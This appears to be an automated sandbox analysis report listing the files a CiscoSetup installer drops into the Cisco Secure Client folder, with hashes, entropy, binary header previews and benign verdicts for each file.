                                                                                                                                      Preview:0.+...*.H........+u0.+q...1.0...`.H.e......0..#..+.....7......0...0...+.....7........i;..A...ag....230706005513Z0...+.....7.....0..X0....1^...H...........1..0...+.....7...1...04..+.....7...1&0$...O.S.A.t.t.r........2.:.1.0...0...0<..+.....7...1.0,...F.i.l.e........a.c.s.o.c.k.6.4...i.n.f...0.... ..z.G_#.(....E;...[I...Qh...N1..0...+.....7...1...04..+.....7...1&0$...O.S.A.t.t.r........2.:.1.0...0...0<..+.....7...1.0,...F.i.l.e........a.c.s.o.c.k.6.4...s.y.s...0]..+.....7...1O0M0...+.....7...0...........010...`.H.e....... ..z.G_#.(....E;...[I...Qh...N0......p.k,...a.B.>.....1..0...+.....7...1...04..+.....7...1&0$...O.S.A.t.t.r........2.:.1.0...0...0<..+.....7...1.0,...F.i.l.e........a.c.s.o.c.k.6.4...s.y.s...0.... .B{[.$>.@.H...tu>.\...`.. ....1..0...+.....7...1...04..+.....7...1&0$...O.S.A.t.t.r........2.:.1.0...0...0<..+.....7...1.0,...F.i.l.e........a.c.s.o.c.k.6.4...i.n.f...0U..+.....7...1G0E0...+.....7.......010...`.H.e....... .B{[.$>.@.H...tu>.\...`.. .......q0..m0J.

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\acsock64.inf (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:Windows setup INFormation
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1898
                                                                                                                                      Entropy (8bit):5.184476593945747
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:1Bgd0zK3NIhE1bnJrGfiuzLOAYCuh35oD8d7/16U8LUFb:1Bgd0zK3NIhEpnJrGftzLO0kpoD8d7UM
                                                                                                                                      MD5:CCB4651BFC7878E5AC78F2D63955A21B
                                                                                                                                      SHA1:315E8C89BA48B0B788AC90D2FFEA97A6C0C2AF94
                                                                                                                                      SHA-256:F4427B5BAE243EED40F2B448C3137F74753E135CD001D860A7DCAB208C929217
                                                                                                                                      SHA-512:BBAF097D051F0E27EB252A639046202430F84DD1DFB30BB35E4F58A0BD24850C61957A4799E04A2A1705FC62E829CC594CB87073FDE16D47C09E216077566925
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:;;; acsock64.inf..;;;..;;; Cisco Secure Client Kernel Driver Framework Socket Layer Interceptor..;;;..;;; Copyright (c) 2004-2021 Cisco Systems, Inc. ..;;;..;;; Abstract:..;;; Callout sample driver install configuration...;;;....[Version]..signature = "$Windows NT$"..Provider = %Cisco%..DriverVer = 06/14/2023,5.0.04021.0..Class = CiscoNetworkFilter..ClassGuid = {729021b6-d014-47b0-8a6a-d2c45f77af4f} ..CatalogFile = acsock64.cat....[SourceDisksNames]..1 = %DiskId1%,,,....[SourceDisksFiles.amd64]..acsock64.sys = 1,,....[DestinationDirs]..DefaultDestDir = 12..Inspect.DriverFiles = 12 ;%windir%\system32\drivers....;..; Copy Files..;....[Inspect.DriverFiles]..acsock64.sys,,,0x00000004 ; COPYFLG_NOVERSIONCHECK....;;..;; Default install sections..;;....[DefaultInstall.ntamd64]..OptionDesc = %InspectServiceDesc%..CopyFiles = Inspect.DriverFiles....[DefaultInstall.ntamd64.Services]..AddService = %InspectServiceName%,,Inspect.Service.

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\acsock64.sys (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PE32+ executable (native) x86-64, for MS Windows
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):305568
                                                                                                                                      Entropy (8bit):6.508762969375985
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:6144:RU6viRkqf6rRsLewEo2eCf4nkra75QtUNxNad3fv27/iTf7G/:RU6viRkqf6rRsLew/23Qkro7x4Vfvwd/
                                                                                                                                      MD5:7119F4B20ECBF6BBB4478A983D34AC70
                                                                                                                                      SHA1:60C6E6B2EF96C540318FBEDEDF81F5D8BD90148E
                                                                                                                                      SHA-256:372D4C634E9C8F1DA8EE0ED5DD54E4D2956564FF7FCF62CDEF20689D2EC47F92
                                                                                                                                      SHA-512:5895F370D1641611BB110D75AADA34DC34359DA83143FE067BB8DD99CCBAB64B832BA7B958C3F09D81B78E3ABBD4601A495BD51070C053D298E7A48745CEC0BC
                                                                                                                                      Malicious:false
                                                                                                                                      Antivirus:
                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......k.../.../.../...&.~.,...&.e.-...;.............;..(...;...+...;..(...;...$.../..........5...................Rich/...................PE..d....a.d.........."............................@.............................0...........`A................................................d....................$.......%... ..\.......T............................................................................text............................... ..h.rdata..`<.......>..................@..H.data....d... ......................@....pdata...$.......&..................@..HPAGE.................<.............. ..`INIT.................Z.............. ..b.rsrc................n..............@..B.reloc..\.... ......................@..B........................................................................................................................................................

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\acwebhelper.dll (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):92776
                                                                                                                                      Entropy (8bit):6.652577402747044
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:1536:JXrBoBxhQlrylel5aThWE7amOMjhO5qg9WyVPDNxsU2xS:JXri65Dl67apMjw5qg9WyB1
                                                                                                                                      MD5:448338FE18DD5BF4F6C6B87203E5ADBA
                                                                                                                                      SHA1:3095A3A7866188806898F5A366E05C53C9AF9788
                                                                                                                                      SHA-256:557F2E566FCA90B4BF853F30130EDB15EE675B76B94377ECF81792EEAA3A2690
                                                                                                                                      SHA-512:13FBEA608AEDEC472419901B6B265608070E5ADBAACFBA71091680B86A4FE0F22564AB01C6DEB283CC501BBE96F12F9196798DF263FC60C828078C66B4D18FA3
                                                                                                                                      Malicious:false
                                                                                                                                      Antivirus:
                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..............U...U...U...U..UQ.T..U..T..U..T..U..T..U..T..U..T..U..T..U...UM..U..T..U..T...U..zU...U...U...U..T...URich...U........PE..L...O..d...........!.........~.......j.......................................`............@A.........................................0..............."..hH...@..(...P...T...............................@............................................text.............................. ..`.rdata..dS.......T..................@..@.data........ ......................@....rsrc........0......................@..@.reloc..(....@......................@..B........................................................................................................................................................................................................................................................................................

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\acwebhelper.exe (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):624232
                                                                                                                                      Entropy (8bit):6.548375643467659
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:12288:XaEbYc+L1pQ1aE6Qo+gbEXefqR5nB3naFKMwKKbtxbZ6+XZdtbjmb2gOb/vBUbyk:XaEbYc+LUtB3ZssEiqYfQQEvFBEfI+Q
                                                                                                                                      MD5:1536EB035B356121711182E1A3413658
                                                                                                                                      SHA1:D188D4ABF1FFA6C7E577D9AD3FDCF1ED57C6BD85
                                                                                                                                      SHA-256:DD600CEDE829CFBE9E1B5B2F1B35219294654C19DC4E9E208CFCF6DF71F2B957
                                                                                                                                      SHA-512:049CA3075D2BE2E0DD3FFD59C5C7EE0A417D3565ED53E9E589CFF7E68AE8E34C91824A97EC6C1C6E0139D4DF485906632E066CC21805FBB299E3FBB1E11A568E
                                                                                                                                      Malicious:false
                                                                                                                                      Antivirus:
                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                      Preview:MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$.......]..Q..~...~...~.......~.......~.K.z...~.K.}...~.K.....~......~...z...~.K.{.6.~.......~...~...~.....G.~..w...~......~.......~..|...~.Rich..~.........................PE..L......d.................0..........`$.......@....@..........................p......@b....@.................................`2..........pS...........>..hH.......Q......T..............................@............@..l............................text..../.......0.................. ..`.rdata..P....@.......4..............@..@.data....K...`...F...R..............@....rsrc...pS.......T..................@..@.reloc...Q.......R..................@..B................................................................................................................................................................................................................................................................

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\boost_chrono.dll (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):45672
                                                                                                                                      Entropy (8bit):6.909278775883234
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:768:kD0B4emSfS7QU1+oZYDGV5ENAMxfwDGV/vUAMxkEr:ce8+oixfRKx/
                                                                                                                                      MD5:F9E23973D3BF6B1A6ECAD723B07FDDD1
                                                                                                                                      SHA1:958C2BBF7D86C8B4527DA5082A4BA3428465031D
                                                                                                                                      SHA-256:9990F20DAA97C9502D6E056EE81E2B8815AF9DAF52A2E22B95A3CCB00C6BA332
                                                                                                                                      SHA-512:48A36927B69443DE27EEE9FFF3D84E06DB6BB050B62A4CE2AC3014362B7BA119648294578545FA48BC95D497FAE1D99D010AA5A1AD78E9C8F15D09F427CE66E5
                                                                                                                                      Malicious:false
                                                                                                                                      Antivirus:
                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......."...f...f...f...o...n.....~.d...4.z.v...4.{.l...4.|.c...4.~.b.....~.e...f.~.U.....z.e.......g.....}.g...Richf...................PE..L.....^...........!.....4...2.......3.......P............................................@.........................._.......o.......................j..hH..........PS..............................pS..@............P...............................text...K2.......4.................. ..`.rdata...%...P...&...8..............@..@.data...|............^..............@....rsrc................b..............@..@.reloc...............d..............@..B........................................................................................................................................................................................................................................................................................................

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\boost_date_time.dll (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):61032
                                                                                                                                      Entropy (8bit):6.808659945563971
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:768:8G+TDeIz+avSPNWxdk8uSDmzItwhHXWT2nLHSJDGV5ENAMxaqydDGVDyAMxkEku:8veOAidk8uSRGWCelxaq/QxV
                                                                                                                                      MD5:4181824994B367CABC348F8E308DD792
                                                                                                                                      SHA1:3C4508092416D6BB68F2BED15BCBA578294FDFE3
                                                                                                                                      SHA-256:AC91D41BDC0EA04E56D2EED724EB487B59E920F59B1E24440F5A3AED11B4E8C4
                                                                                                                                      SHA-512:C802E372F6886F968BEE9DC6AD512F0DAA666C0632AF5EAEA63605733749D718879202BA8C9225BDD083D24B079B110ED37A2B1E9AD868AEF149B122703D2177
                                                                                                                                      Malicious:false
                                                                                                                                      Antivirus:
                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.....................}..................................~.....~.....~.....Rich...........................PE..L.....^...........!.....R...P......@R.......p............................................@.....................................x.......................hH...........z......................P{.......z..@............p...............................text...kP.......R.................. ..`.rdata...;...p...<...V..............@..@.data...............................@....rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................................

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\boost_filesystem.dll (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):126568
                                                                                                                                      Entropy (8bit):6.722288477011462
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:3072:gGGKu/VLwQR1ky0vAF2/Fk5kIEFor6SVTdUT75VU:gGGKu/VLwYIAA++9ohVpUf5VU
                                                                                                                                      MD5:23F1917EF17DB9B94F4E4FFBE56320FB
                                                                                                                                      SHA1:964967CCBB8AEE664E8294B39E72A608C17B41A0
                                                                                                                                      SHA-256:0E48269187B4D99FC892B373EA247A48E852F71792F5F28E30001C509B8A3971
                                                                                                                                      SHA-512:ACCAC7B61E6D18662E1FF702D41052F519EE029FE4820185168B5CDF7049526DD28B43F0A84C1FFB8E2C0E1AE933D351EF9CB6AE9D410F1C312FA5DB01127120
                                                                                                                                      Malicious:false
                                                                                                                                      Antivirus:
                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........Z............../..........................................................................Rich............PE..L.....^...........!......................... ...........................................@..........................T...D..,...........................hH...........+.......................+......0+..@............ ...............................text............................... ..`.rdata...... ......................@..@.data...............................@....rsrc...............................@..@.reloc..............................@..B................................................................................................................................................................................................................................................................................................................

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\boost_system.dll (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):37992
                                                                                                                                      Entropy (8bit):6.96957396675789
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:768:kkB1x1cnnFDRhUtUMquc51DGV5ENAMxD26DGVkDAMxkEjb:x1LcnFFWRvcnxD3jxvb
                                                                                                                                      MD5:D10B79B1F82E60C76CB92B91DB45D3AB
                                                                                                                                      SHA1:19739B47088E76EDB8724D19A66BF4416C96CCED
                                                                                                                                      SHA-256:F9F4B8E1C40557F06A5426A83D3423C57E75EE02938392984D478F155F13BDFC
                                                                                                                                      SHA-512:4A337B08446DA741844436268B971ED83ADA00FE0A184D9C228382565F0B694C185D6BECBF7350EFC2363813F3E0EDC77F7D5C70CBB436CC58C103C8E782F844
                                                                                                                                      Malicious:false
                                                                                                                                      Antivirus:
                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D..f*..f*..f*......f*...+..f*.../..f*......f*...)..f*...+..f*..f+..f*.../..f*...*..f*...(..f*.Rich.f*.........PE..L.....^...........!.....&...".......,.......@......................................V.....@..........................L..L...LN..x....p...............L..hH......t...0C.......................C......PC..@............@...............................text....%.......&.................. ..`.rdata.......@.......*..............@..@.data........`.......@..............@....rsrc........p.......D..............@..@.reloc..t............F..............@..B........................................................................................................................................................................................................................................................................................................................

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\boost_thread.dll (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):97384
                                                                                                                                      Entropy (8bit):6.671284905085064
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:1536:uqA5yIFN6BM8oAb7KgcvteBM53LZLux2ZXcpXNmzoPd0y+oo49FxyrPxTq:05yIFIM8pbeteBMXNZXI0y+oo4P
                                                                                                                                      MD5:7E67C939282B7893B1FC6624F7BE497E
                                                                                                                                      SHA1:E38043283573321310A9028EDAA4CC5E79C0B033
                                                                                                                                      SHA-256:5263F59556A66F4837D866BDD3C81D4D552811DDF554F76AB64902D3A5486D8E
                                                                                                                                      SHA-512:014DE12B5EAE20091F99256C381272B3323284FD5D8014E740FE3FA4C27B9F7449AE29D91E196BE3FE7E903B887B6BE03889B7A7F8312640AF5228C33B15063A
                                                                                                                                      Malicious:false
                                                                                                                                      Antivirus:
                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$....................1.................................._..........._......_......_......Rich...........................PE..L.....^...........!.........n...............................................p......iU....@.................................X$.......@...............4..hH...P......p.......................0...........@...............P............................text...k........................... ..`.rdata..DM.......N..................@..@.data........0......................@....rsrc........@......................@..@.reloc.......P....... ..............@..B................................................................................................................................................................................................................................................................................................

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\cfom.dll (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):411752
                                                                                                                                      Entropy (8bit):6.881611330499658
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:6144:0IPmqpO6R1WKsOcYY0HUxBufpzBJJJ8mdjIIIIX1Emy9uQ1jjj6eSPfp:DPN4g1oOcc0xGO6hlvPh
                                                                                                                                      MD5:0B1C614353D5012752C02F5425C1B0DD
                                                                                                                                      SHA1:1197BA2379472A303187FEA328EF79F5C6B66E46
                                                                                                                                      SHA-256:804B953D07F40A09958547947D871B06DE54D34774CA13671AF583C24114D8A2
                                                                                                                                      SHA-512:280C219212850D9EAD379D7F8223003F1DF1B180BCC27334BC2FBA27232312CA135212AA8E902B912F3265156B210017087A9D698028AF26E529E17D053425E0
                                                                                                                                      Malicious:false
                                                                                                                                      Antivirus:
                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......9:.3}[.`}[.`}[.`t#x`s[.`/..a.[.`/..aq[.`/..aw[.`/..ax[.`i0.a{[.`(..a~[.`}[.`.[.`}[.`p[.`(..a.[.`(..a|[.`(..a|[.`Rich}[.`................PE..L.....Od...........!................ ........................................P............@A............................x...X...........................hH... ...#......T...............................@............................................text....}.......~.................. ..`fipstx...n.......p.................. ..`.rdata...(.......*..................@..@.data........0......................@...fipsro..`]...P...^... ..............@..@fipsda...............~..............@...fsig................................@..@fipsrd...M.......N..................@..@.reloc...#... ...$..................@..B................................................................................................................................

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\concrt140.dll (copy)

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):243576
                                                                                                                                      Entropy (8bit):6.63219267320993
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:6144:aLy1UNAZHA2nSG5LbEcutDsSaqiOHYb836TLLOeHFQyS9uLms12z/NpJ9yne:2hkH0Yb83KLxmuLmdzoe
                                                                                                                                      MD5:9AD549C121108B3B1408A30BEE325D08
                                                                                                                                      SHA1:898FFC728087861E619DABABD8E65CC902276D06
                                                                                                                                      SHA-256:263975E4F5AFC90E91F9F601080B92C9FBC5E471132F63AD01C6C4F99B33B83A
                                                                                                                                      SHA-512:9A9005ACF2AF86D6A0A95773E968D98E90B7E71E8E71D58949FF51AAD49050DCA57D94A19671B1B5026BD74E7B627F31D0C8A50BB66AB740D629022C3A95D579
                                                                                                                                      Malicious:false
                                                                                                                                      Antivirus:
                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......V.3...]X..]X..]X..\Y..]X...X..]X@.\Y..]X..\X..]X@.YY..]X@.^Y..]X@.XYA.]X@.]Y..]X@..X..]X@._Y..]XRich..]X................PE..L...=|.a.........."!.........x......p........0......................................?I....@A........................ ....K..<r..........................x#.......+...;..8............................<..@............p..8............................text............................... ..`.data....4...0...2... ..............@....idata..~....p.......R..............@..@.rsrc................d..............@..@.reloc...+.......,...h..............@..B................................................................................................................................................................................................................................................................................................................

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\is-0CFDM.tmp

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1035368
                                                                                                                                      Entropy (8bit):6.730008187623686
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:12288:zx1d5ucCv/+XrPAQ/gL+EIK6bs6l7HNLM8RL45fvfmY3YrA0RFZa:z5iH+T/9y6I69HNLM8d45ZYrtRLa
                                                                                                                                      MD5:1987D72B9C16314FC1BDEC8315AA31B4
                                                                                                                                      SHA1:55BA31FA638F3EF505D450DAAFF5F2E6EFBB59A9
                                                                                                                                      SHA-256:CABF64B736A3217E51FE4F49DC164C2CB5218D03F05AE4B932C7D362AB5A2CFD
                                                                                                                                      SHA-512:417993511DFCACD266D459ED0B7204327D6B488F9A338C06090D81036D9B1A3D24F87E2251447F74CA655F5E234D57DF0685C45458FFDB47EB246B6E2E2E9692
                                                                                                                                      Malicious:false
                                                                                                                                      Antivirus:
                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                      Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.........|..|...|...|.......|.......|.......|.......|.......|..$....|.......|.......|.......|.......|...|......$....|..$....|..$...|...|...|..$....|..Rich.|..........PE..L...M..d...........!.................G....................................................@A............................\T..............................hH..............T...........................@...@............................................text...,........................... ..`.rdata..............................@..@.data....3.......0..................@....rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\is-1N4FB.tmp

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):61032
                                                                                                                                      Entropy (8bit):6.808659945563971
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:768:8G+TDeIz+avSPNWxdk8uSDmzItwhHXWT2nLHSJDGV5ENAMxaqydDGVDyAMxkEku:8veOAidk8uSRGWCelxaq/QxV
                                                                                                                                      MD5:4181824994B367CABC348F8E308DD792
                                                                                                                                      SHA1:3C4508092416D6BB68F2BED15BCBA578294FDFE3
                                                                                                                                      SHA-256:AC91D41BDC0EA04E56D2EED724EB487B59E920F59B1E24440F5A3AED11B4E8C4
                                                                                                                                      SHA-512:C802E372F6886F968BEE9DC6AD512F0DAA666C0632AF5EAEA63605733749D718879202BA8C9225BDD083D24B079B110ED37A2B1E9AD868AEF149B122703D2177
                                                                                                                                      Malicious:false
                                                                                                                                      Antivirus:
                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.....................}..................................~.....~.....~.....Rich...........................PE..L.....^...........!.....R...P......@R.......p............................................@.....................................x.......................hH...........z......................P{.......z..@............p...............................text...kP.......R.................. ..`.rdata...;...p...<...V..............@..@.data...............................@....rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................................

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\is-2J155.tmp

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):347752
                                                                                                                                      Entropy (8bit):6.708372875308561
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:6144:xS6/w5Vk2RM0ZdTNd5JYjV7JYwXhik4QNEN519X+Iw99Itmf:xS5Vk2RtZw5JYwXhpzyNttg
                                                                                                                                      MD5:84EB38D113F69752F45B9A1852536093
                                                                                                                                      SHA1:D24161590E4C7541D183A0871694DEFE92F81783
                                                                                                                                      SHA-256:276C98884E9945BC79AB4D84069CFE543752FBD064E88EE78DE0256F8B1DF374
                                                                                                                                      SHA-512:0B69B29809915DFC348AD36E528BE4DE5E251F30AA7E3FA1017F1F3A24FF315C4F5290423D15C62AA3E4F3AFA573362675177EC05E48B78FA2995C2D5F5BD310
                                                                                                                                      Malicious:false
                                                                                                                                      Antivirus:
                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........L/D.-A..-A..-A..U...-A..E@..-A.+....-A..ED..-A..EE..-A..EB..-A..K@..-A..D@..-A..-@..,A..DE.(-A..DA..-A..D...-A..DC..-A.Rich.-A.................PE..L...-m.b...........!.........*...............................................@............@................................T...@.......................hH.......3..P...T...............................@...............d............................text...U........................... ..`.rdata..D...........................@..@.data...\...........................@....rsrc...............................@..@.reloc...3.......4..................@..B........................................................................................................................................................................................................................................................................................

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\is-2TJID.tmp

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):486504
                                                                                                                                      Entropy (8bit):6.862184684725985
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:12288:cxog6V56WiNYPTL0x+/OB7hiCM/JFJQtqx:cxo/V56WiyPhe7kCM/fJQt0
                                                                                                                                      MD5:B5206EC55DD02AA88783189589F72953
                                                                                                                                      SHA1:F8180A92BEFAF78EED660435425B1B0B97BFA730
                                                                                                                                      SHA-256:F6F22F6C9A31CB561E69D5D5892EAA4A44A51FCF36AB27841A00AA07E33ABD68
                                                                                                                                      SHA-512:4A117F579A3BABBB7C6CF8072671E1363BEB63869030A2D0B376BBEFA448F88CC2CAED6F17026A5AB34A8E3E9B3EEF80DD8BD2441FAAF70D13F917DDA9FB8BAB
                                                                                                                                      Malicious:false
                                                                                                                                      Antivirus:
                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                      Preview:MZ......................@...................................0...........!..L.!This program cannot be run in DOS mode....$.......&.b...b...b...k.E.t.....+.f...0...h...0...d...0...{...0...f......d...v...j.......|...7...a...b.........n......c....).c...b.A.c......c...Richb...........................PE..L......d...........!.........N......P........................................`.......,....@A.........................}..x............................$..hH.......R..PL..T....................M.......L..@...............l............................text............................... ..`.rdata..............................@..@.data...x...........................@....rsrc...............................@..@.reloc...R.......T..................@..B........................................................................................................................................................................................................................................................

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\is-3JN2R.tmp

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):37992
                                                                                                                                      Entropy (8bit):6.96957396675789
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:768:kkB1x1cnnFDRhUtUMquc51DGV5ENAMxD26DGVkDAMxkEjb:x1LcnFFWRvcnxD3jxvb
                                                                                                                                      MD5:D10B79B1F82E60C76CB92B91DB45D3AB
                                                                                                                                      SHA1:19739B47088E76EDB8724D19A66BF4416C96CCED
                                                                                                                                      SHA-256:F9F4B8E1C40557F06A5426A83D3423C57E75EE02938392984D478F155F13BDFC
                                                                                                                                      SHA-512:4A337B08446DA741844436268B971ED83ADA00FE0A184D9C228382565F0B694C185D6BECBF7350EFC2363813F3E0EDC77F7D5C70CBB436CC58C103C8E782F844
                                                                                                                                      Malicious:false
                                                                                                                                      Antivirus:
                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........D..f*..f*..f*......f*...+..f*.../..f*......f*...)..f*...+..f*..f+..f*.../..f*...*..f*...(..f*.Rich.f*.........PE..L.....^...........!.....&...".......,.......@......................................V.....@..........................L..L...LN..x....p...............L..hH......t...0C.......................C......PC..@............@...............................text....%.......&.................. ..`.rdata.......@.......*..............@..@.data........`.......@..............@....rsrc........p.......D..............@..@.reloc..t............F..............@..B........................................................................................................................................................................................................................................................................................................................

                                                                                                                                      C:\Program Files (x86)\Cisco\Cisco Secure Client\is-3NCDE.tmp

                                                                                                                                      Download File
                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-DKP86.tmp\CiscoSetup.tmp
                                                                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):411752
                                                                                                                                      Entropy (8bit):6.881611330499658
                                                                                                                                      Encrypted:false
